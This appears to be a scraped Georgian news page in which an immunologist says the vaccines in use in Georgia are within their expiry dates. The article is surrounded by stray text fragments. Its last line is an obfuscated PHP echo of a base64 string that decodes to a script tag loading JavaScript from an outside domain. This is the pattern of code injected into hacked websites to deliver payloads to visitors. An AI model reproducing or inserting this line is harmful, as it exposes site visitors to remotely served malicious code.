celsiusi
ავერსი შნაიდერი
იმუნიზაციის საბჭოს წევრი, ალერგოლოგ-იმუნოლოგი ბიძინა კულუმბეგოვი „ნეტგაზეთთან” ინტერვიუში აცხადებს, რომ საქართველოში ამ დროისთვის არსებულ ყველა ვაქცინას აქვს ვადა და მოქალაქეებს ამ კუთხით კითხვის ნიშნების ქონის საფუძველი არ გააჩნიათ.
 
კულუმბეგოვის ინფორმაციით, საქართველოში ამ დროისთვის ფაიზერის წარმოებული 400 000 დოზა ვაქცინაა, რომელსაც ვადა 31 მარტამდე აქვს.
 
როგორც კულუმბეგოვი ამბობს, სწორედ ვადის გასვლის გამო გასული წლის დეკემბერში ქვეყანამ 17 500 დოზა „ასტრაზენეკას“ წარმოებული ვაქცინა ამოიღო ხმარებიდან და გადაყარა. რაც შეეხება ჩინურ ვაქცინებს, მათ შენახვის ორწლიანი ვადა აქვს.
 
“ვერც ერთი სამედიცინო სტრუქტურა და მით უმეტეს, ჯანდაცვის სისტემა ვერ გაბედავს, მოქალაქეებს ვადაგასული ვაქცინა შესთავაზოს. ეს სრული ნონსენსია. ამ გადაწყვეტილებებს იღებს ამერიკის დაავადებათა კონტროლი, ამერიკის წამლისა და საკვების სააგენტო და ა.შ. ეს არ არის ინდივიდუალური გადაწყვეტილება“ – ამბობს ბიძინა კულუმბეგოვი „ნეტგაზეთთან“ ინტერვიუში და მოქალაქეებს ვაქცინაციისკენ მოუწოდებს.
675
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");